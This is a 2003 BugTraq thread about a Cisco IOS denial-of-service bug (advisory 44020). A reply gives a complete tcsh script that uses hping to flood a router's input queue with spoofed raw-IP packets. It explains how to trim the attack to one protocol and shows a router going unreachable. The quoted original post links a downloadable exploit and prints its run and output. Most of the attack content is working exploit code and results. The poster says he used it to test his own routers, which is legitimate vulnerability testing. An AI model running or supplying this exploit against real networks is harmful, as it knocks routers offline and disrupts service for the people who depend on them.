BugTraq
RE: Cisco IOS exploit (44020) Jul 21 2003 05:18PM
Donahue, Pat (PDonahue acmicorp com) (1 replies)
Here's a much simpler shell script that produces the same result:

--- BEGIN SHELL SCRIPT ---
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53 55 77 103)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
$protocol --count 19 --interval u250 --data 26
end
--- END SHELL SCRIPT ---

There's little reason to compile source code that will be run as root if
the same thing can be accomplished with a tool that has been used and
trusted by systems administrators for quite some time. Hping can be
found at http://www.hping.org and "is a command-line oriented TCP/IP
packet assembler/analyzer".

Before upgrading my routers, I wrote this script to confirm that they
were indeed vulnerable. As you can see, the script iterates over the
various protocols (SWIPE, IP Mobility, Sun ND, PIM) and sends 19 packets
each using hping for a total of 76 (one more than needed to fill up the
input queue).

What is interesting to note is that the input queue on the interface can
be exploited using just one of the vulnerable protocols; try changing
the "foreach protocol (53 55 77 103)" line to "foreach protocol (53)"
and then changing the "--count 19" parameter to "--count 76". When I
first read the security advisory I thought that Cisco had tried to make
it seem that all 4 were necessary.

You must be able to open raw sockets so either run the script as root or
set the suid bit. The syntax is: ./exploit.sh <hostname|address> <ttl>
where <hostname|address> is the hostname or IP address of the vulnerable
Cisco IOS device and <ttl> is the TTL subtracted by 255.

Here is an example:

> ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=1.063 ms
^C

> telnet 192.168.1.1
User Access Verification

Password:
telnet> close

# ./exploit.sh 192.168.1.1 0
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

> telnet 192.168.1.1
Trying 192.168.1.1...
telnet: Unable to connect to remote host: No route to host

And finally, from the console:

Router> show int FastEthernet0/0 | include Input
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0

Regards,
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

-----Original Message-----
From: Martin Kluge [mailto:martin (at) elxsi (dot) de [email concealed]]
Sent: Monday, July 21, 2003 12:02 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Cisco IOS exploit (44020)

Hi,

I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz

This exploit is NOT broken (like the shadowchode.tar.gz exploit for
example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.

User Access Verification

Username: 103
Password: ******

1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE
SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE
(fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9),
RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of
memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
...
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I login via term, I can see the following:

Press RETURN to get started!

00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0,
changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1,
changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2,
changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE
SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia
0060.7062.5727)
Internet address is 192.168.1.123/24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
Encapsulation ARPA, loopback not set, keepalive set (10 sec)
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:02:04, output 00:00:04, output hang never
Last clearing of "show interface" counters never
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
^^
||
The input queue is full :)

Cheers,
Martin Kluge
--
Name : Martin Kluge
email : martin (at) elxsi (dot) info [email concealed]
Phone : +49 160 1515182
Projects : http://www.aa-security.de
GPG Key : http://www.elxsi.de/key.pub

[ reply ]
RE: Cisco IOS exploit (44020) Jul 21 2003 08:02PM
Jerry Shenk (jshenk decommunications com)


 

Privacy Statement
Copyright 2010, SecurityFocus